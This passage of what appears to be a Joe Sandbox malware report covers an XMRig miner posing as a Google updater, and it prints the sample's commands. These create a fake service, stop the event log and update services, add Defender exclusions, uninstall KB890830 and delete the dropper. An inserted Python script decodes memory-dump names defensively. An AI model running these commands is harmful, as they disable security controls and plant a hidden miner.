                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:28
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:29
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:30
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:31
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:32
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:33
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\updater.exe"
                                        Imagebase:0x7ff7dfec0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:34
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:35
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:36
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\ProgramData\Google\Chrome\updater.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\ProgramData\Google\Chrome\updater.exe
                                        Imagebase:0x7ff758ee0000
                                        File size:2'728'960 bytes
                                        MD5 hash:A0C374F31894AA332D158F56608C89C3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 96%, ReversingLabs
                                        • Detection: 82%, Virustotal
                                        Has exited:true

                                        Target ID:37
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\choice.exe
                                        Wow64 process (32bit):false
                                        Commandline:choice /C Y /N /D Y /T 3
                                        Imagebase:0x7ff748040000
                                        File size:35'840 bytes
                                        MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:38
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                        Imagebase:0x7ff7f8990000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:39
                                        Start time:19:46:13
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:40
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff7dfec0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:41
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:42
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:43
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:44
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\wusa.exe
                                        Wow64 process (32bit):false
                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff752950000
                                        File size:316'416 bytes
                                        MD5 hash:E43499EE2B4CF328A81BACE9B1644C5D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:45
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:46
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:47
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:48
                                        Start time:19:46:14
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:49
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:50
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:51
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:52
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:53
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:54
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:55
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:56
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:57
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:58
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:59
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:60
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:61
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:62
                                        Start time:19:46:15
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\svchost.exe
                                        Wow64 process (32bit):false
                                        Commandline:svchost.exe
                                        Imagebase:0x7ff673790000
                                        File size:57'360 bytes
                                        MD5 hash:F586835082F632DC8D9404D83BC16316
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                        Has exited:false


                                          Execution Graph

                                          Execution Coverage:5%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:21.1%
                                          Total number of Nodes:180
                                          Total number of Limit Nodes:2

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                          • String ID: &
                                          • API String ID: 2643109117-1499360005
                                          • Opcode ID: a143279de87784c29542b8cb12405773007f83f22a7bc91e9d7b56bbb9964d85
                                          • Instruction ID: 90ee267a871b2cc9090b059d2215e00a42989b6c35bc6194983aaf83e21cd467
                                          • Opcode Fuzzy Hash: a143279de87784c29542b8cb12405773007f83f22a7bc91e9d7b56bbb9964d85
                                          • Instruction Fuzzy Hash: 0B413AB1E09A4381FA10DB19E95437923A1BF59B80F5C5031CA9DEF7A6DE6EBC51C320
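The "Memory Dump Source" names repeated on every function record encode the process region each dump was taken from, and reading them is the quickest way to confirm that the analysed code ran from an unmodified, execute-only image region rather than from writable memory. The script below is an added example, not part of the Joe Sandbox report or its tooling. It assumes, purely from the values on this page and not from any Joe Sandbox documentation, that the fourth dot-separated field of a dump name is the region base address, the fifth the Win32 PAGE_* protection (0x20 = PAGE_EXECUTE_READ) and the seventh the MEM_* region type (0x01000000 = MEM_IMAGE); the other fields are left undecoded. The RWX dump name at the end is constructed to show a positive hit.

```python
"""Rebuild the in-memory image layout of updater.exe from the Joe Sandbox
memory-dump names on this page and check it for writable+executable regions.

Added example; not Joe Sandbox code.  Field layout of a dump name is an
assumption inferred from the values on this page:
  00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp
  field[3] = region base, field[4] = PAGE_* protection, field[6] = MEM_* type.
"""
from dataclasses import dataclass
from typing import List, Optional

# Win32 memory protection constants (winnt.h).
PAGE_NOACCESS, PAGE_READONLY, PAGE_READWRITE, PAGE_WRITECOPY = 0x01, 0x02, 0x04, 0x08
PAGE_EXECUTE, PAGE_EXECUTE_READ = 0x10, 0x20
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
PAGE_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS", PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE", PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE", PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
# Win32 region types (winnt.h).
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}


@dataclass(frozen=True)
class Region:
    base: int
    protect: int
    region_type: int
    dump: str

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)


def parse_dump_name(name: str) -> Region:
    """Decode one .sdmp name under the assumed field layout (see module docstring)."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected dump name layout: {name}")
    return Region(base=int(fields[3], 16), protect=int(fields[4], 16),
                  region_type=int(fields[6], 16), dump=name)


def build_memory_map(names: List[str]) -> List[Region]:
    """Parse every dump name and return the regions sorted by base address."""
    return sorted((parse_dump_name(n) for n in names), key=lambda r: r.base)


def find_wx_regions(regions: List[Region]) -> List[Region]:
    """Writable AND executable regions: the usual sign of in-place unpacking or patched code."""
    return [r for r in regions if r.executable and r.writable]


def region_for(regions: List[Region], address: int) -> Optional[Region]:
    """Best-effort lookup: the dump with the greatest base not above `address`.
    Dump names carry no size, so an address in a gap is attributed to the preceding dump."""
    hit = None
    for r in regions:  # regions are sorted ascending
        if r.base > address:
            break
        hit = r
    return hit


def describe(regions: List[Region]) -> List[str]:
    """One human-readable line per region: base, protection, type."""
    return [f"{r.base:#018x}  {PAGE_NAMES.get(r.protect, hex(r.protect)):<24}"
            f"{TYPE_NAMES.get(r.region_type, hex(r.region_type))}" for r in regions]


# The nine dump names attached to the function records on this page.
REPORT_DUMPS = [
    "00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmp",
    "00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmp",
]
# Constructed name (NOT from the report): a private PAGE_EXECUTE_READWRITE region.
CONSTRUCTED_RWX_DUMP = "00000000.00000002.000000000000.00007FF700000000.00000040.00000001.00020000.00000003.sdmp"

if __name__ == "__main__":
    layout = build_memory_map(REPORT_DUMPS)
    print("\n".join(describe(layout)))
    print("W+X regions in report:", [hex(r.base) for r in find_wx_regions(layout)])
    # VirtualQuery call site from an APIs list on this page, ref: 00007FF6568E1C63
    print("0x7FF6568E1C63 lies in", hex(region_for(layout, 0x7FF6568E1C63).base))
```

Run on the nine names from this page the map contains no writable+executable region: the code dump at 7FF6568E1000 is PAGE_EXECUTE_READ and every referenced call site resolves into it, which is what an unpacked, on-disk PE looks like. A PAGE_EXECUTE_READWRITE or MEM_PRIVATE entry among a process's dumps, as with the constructed name, would be the place to start looking for unpacked or injected code.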

                                          Control-flow Graph

                                          APIs
                                          • NtRollbackTransaction.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6568E1156), ref: 00007FF6568E13F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: RollbackTransaction
                                          • String ID:
                                          • API String ID: 392415941-0
                                          • Opcode ID: 1d3dcb4b41951578468dfebce8a3b5ee3b4e38d1bfb761ac12e8c11205364101
                                          • Instruction ID: c7383a12ff3736d306c51cd16791c87c71104b0b12a4a607095c387cf195d7b7
                                          • Opcode Fuzzy Hash: 1d3dcb4b41951578468dfebce8a3b5ee3b4e38d1bfb761ac12e8c11205364101
                                          • Instruction Fuzzy Hash: F6F0FF7190CB43D6DA10DB51F84102A77A0FB49380B085835E9CCAB725CF3EE955CB60

                                          Control-flow Graph

                                          Control-flow graph for the function at 7ff6568e6779 (graph image not reproduced; node listing summarised): imported calls wcslen, _wcsnicmp, memset, wcscpy, wcscat and memcpy; internal calls to 7ff6568e153f, 7ff6568e145e, 7ff6568e2f70, 7ff6568e39c0, 7ff6568e14c7, 7ff6568e3350, 7ff6568e97d0 and 7ff6568e1370. The executed/not-executed colouring of the rendered graph is not recoverable here.
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: wcslen$_wcsnicmp
                                          • String ID: 0$X&
                                          • API String ID: 4256727079-1646855245
                                          • Opcode ID: 2ad9b95b428851b68ec7e9912ffa00502d73405e26e9a561cf93f4fe1461c13d
                                          • Instruction ID: 532f859f98f55e8ff2fa40a83c2e5f99d8f60e970029d6ef91d6efd8f0eb21ea
                                          • Opcode Fuzzy Hash: 2ad9b95b428851b68ec7e9912ffa00502d73405e26e9a561cf93f4fe1461c13d
                                          • Instruction Fuzzy Hash: D6425261D2C6C784F7218B29D8413F46370BF96388F4C5235D99CFA6A1EFAE66A5C310

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmp
